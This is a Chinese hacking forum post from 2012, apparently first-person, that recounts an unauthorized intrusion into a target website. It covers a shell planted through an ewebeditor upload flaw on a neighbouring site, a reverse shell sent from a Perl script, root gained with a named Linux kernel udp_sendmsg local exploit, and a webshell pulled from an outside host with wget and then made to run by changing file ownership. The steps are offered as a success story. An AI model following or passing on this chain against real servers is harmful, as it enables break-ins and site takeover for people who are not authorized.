设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
一次linux入侵提权到搞定目标网站
返回列表
发新帖
一次linux入侵提权到搞定目标网站
[复制链接]
360
|
0
|
2012-4-1 19:20:27
|
显示全部楼层
|
阅读模式
刚上qq,一朋友叫我搞个网站。闲着无事打开一看是dz的,我手里没有0day只好旁注了。发现一站有ewebeditor的php版,登录后台添加了样式加上php,结果上传php马不成功。后来通过网站的说明文件才知道ewebeditor后台的样式只有abc管用,老规矩搞到一shell。拿到shell一看是linux的,想着先跨站。shell浏览目标站不行,命令行下输入ls-la/www.users/目标站/也不行。连接mysql,想out个shell到目标站也失败了。没办好,只好溢出了。上传1.pl反弹个shell到cmd。uname-r查看版本,2.6.18的,马上想到udev,试了不行。然后去天阳那里的exp一个一个下了试了还是不行。
最后只好去http://www.milw0rm.com/看看搜索2.6出来好多,最终LinuxKernel<2.6.19udp_sendmsgLocalRootExploit(x86/x64)这个0day溢出成功,拿到root权限,pwd列出当前目录。然后cd到目标站目录。wgethttp://http://hi.baidu.com/bian花/shell.txtmvshell.txtshell.php。兴冲冲的去打开shell。结果提示"CGI/PHP程序错误:该脚本不允许执行"。无语了以为权限不够,直接chmod777shell.php还是提示那个错误。网上搜索了下有人提到chownftpd:xxxx.php,试了继续悲剧。
后来想了会,chown这个命令是查看文件的所有者。ls-la论坛结果发现论坛的文件前面的拥有者是user_aaa后面是ftpd,继续执行chownuser_aaa:shell.php最终搞定了目标站。
其实有root权限了,能做许多事,当初touch个a.php然cat追加写入一句话,还是那个错误提示。当然我们完全可以查看论坛的conn文件,只是我一心想着在目标站写个shell
*
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
沙城主
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)